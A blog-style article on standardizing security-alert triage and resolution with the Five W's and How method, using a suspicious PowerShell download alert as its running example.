Standardizing Alert Resolution: Bridging the Cyber Security Skill Gap

The Cyber Security skill gap has been an issue for a while. Upon entry to the workforce, expectations are high. Knowledge of investigation practices and technology is a must. Understanding various attacks and alerts within the environment has to be second nature.

So how do you resolve an alert? Simple: get yourself 10,000 alerts and begin resolving them. Once completed, emerged patterns will shine for true positives. Alert resolved.

Learning through repetition, like math class. Through grind or courses that imitate the grind. This method of experience gain is slow and inconsistent across individuals. Introducing inconsistencies in alert resolution output.

How can we generate output with consistent and useful results? Let's try this again. What information from an event can aid us in taking appropriate action?

Dealing with repeatability, consistency is key. Coupling alert triage and alert resolution in a standardized process. Creates a symbiotic relationship. Focusing on consistency of information, rather than good & evil. Precise questions will lead to an understanding of the event. In turn will provide a more consistent output from each alert. Let us then standardize this questioning process and not worry about resolution.

The Magic

The Rule of standardization is repeatability and consistency. Generic and targeted questions will help to extract the needed information. The Five W's & How(5w1h), an information gathering and problem-solving method. This time-tested method can provide us this solution.

Preparation - What

Any problem, benefits from a great starting point. Understanding the trigger provides initial information about potential pivotal points. What should be clear before starting?

- Which data does the alert use for detection? (source)

- What are the trigger condition? (detection logic)

- What doesn't the alert detect? (blind spots)

- How to react to the event? (Response)

Let's look at Suspicious PowerShell Download - PowerShell Script. A suspicious PowerShell execution. Event is present within PowerShell and process execution logs . The trigger is download activity. This detection tracks potential staging activity, but intent requires analysis of the download. Using a different class or obfuscation techniques will provide false negatives.

Seasoned analysts who spend years honing their craft are aware of their environment. The key to a successful investigation.

Entities - The Who

Entities or action owners, hosts, IPs, domains, users, paths and hashes. A good logging source provides surrounding details. The actor, time, and action. These details allow us to answer the important question. Who triggered this alert?

Knowing everything from the hostname, the assigned IP, the username. Leads us to the individual involved. This is exactly what we need to answer, when asking "Who triggered this alert?""

These artifacts provide us with the ability to pivot; to see the event as it unravels. Classification of entities guides how and where you can pivot.

Linking network logs with a user is not possible without creating connections. Going from a user to network traffic requires a relationship. Creation of these links requires knowing everything about the entities involved. This yields the ability to see network traffic for the user involved.

Timeline - The When

Using entities to pivot to other sources grants us timeline, the whole picture. Knowledge of a start, a middle, and an end; when a specific artifact was first and last seen. This paints what happened around the event. With the timeline drafted, a pattern of the attack is seen.

High-level view helps us understand what happened. Narrows our search to confirm our suspicions.

Referring back to the PowerShell detection. Knowing the PowerShell child process can confirm if malicious intent was present. Proving suspicious behavior.

Impact - The Where

The resource is a driving factor for urgency. Resource type and its importance will determine our course of action. Awareness of infrastructure hierarchy paints the way to the criticality of the event.

Knowledge of external team events. Provides internal intelligence to determine false positive triggers. Service upgrade windows can cause spikes in events. Generating alerts that lack intent. Understanding infrastructure at this level helps determine the priority of events. Allowing the ability to focus on what's important.

Intent - The Why

The time to organize the pieces and understand the event. The gathering of information is complete. The analysis starts. Reviewing findings is a crucial step when it comes to understanding the alert. The intent, or knowledge of why the alert triggered in the first place. The analysis to determine maliciousness. At this point, if true intent exists. The containment phase will begin.

Tying off loose ends, to determine the spread will assist during the containment. A summary helps with personal understanding of what happened. This will allow us to see what had conspired. The big picture.

The why step, provides a stopping point, a break. To look over everything and make sense of it. It is during this step, a determination of true positive/false positive can be done. It is also the place to ask: "Is this something to worry about?"

Prevention - The How

A prevention step, the how. Analyzes information to discover the root cause. Whether the event was a true positive or not. Understanding why it triggered helps us prevent it in the future. Preventions can take many forms.

Implementation of new security measures; hardening the security posture of the infrastructure. The discovery of blind spots will provide new knowledge to be aware of in the future.

The root cause, helps us understand how the event started and why it was successful. This is a huge step in understanding how to better the security of the company. Knowing how a threat got in, provides us with the ability to plan ahead.

Conclusion

Alert resolution can be a tricky endeavor that takes repetition to learn. By structuring a series of questions to help and understand an event. With standardization, achieving better understanding and resolution is possible.

Standardizing the extracted information assists us with the ability to replicate the steps. Once replication is possible, automation is soon to follow.

In automation, breaking up the problem is key. By automating the gathering of pieces. Alert resolution time will quicken, which in turn provides more time for analysis.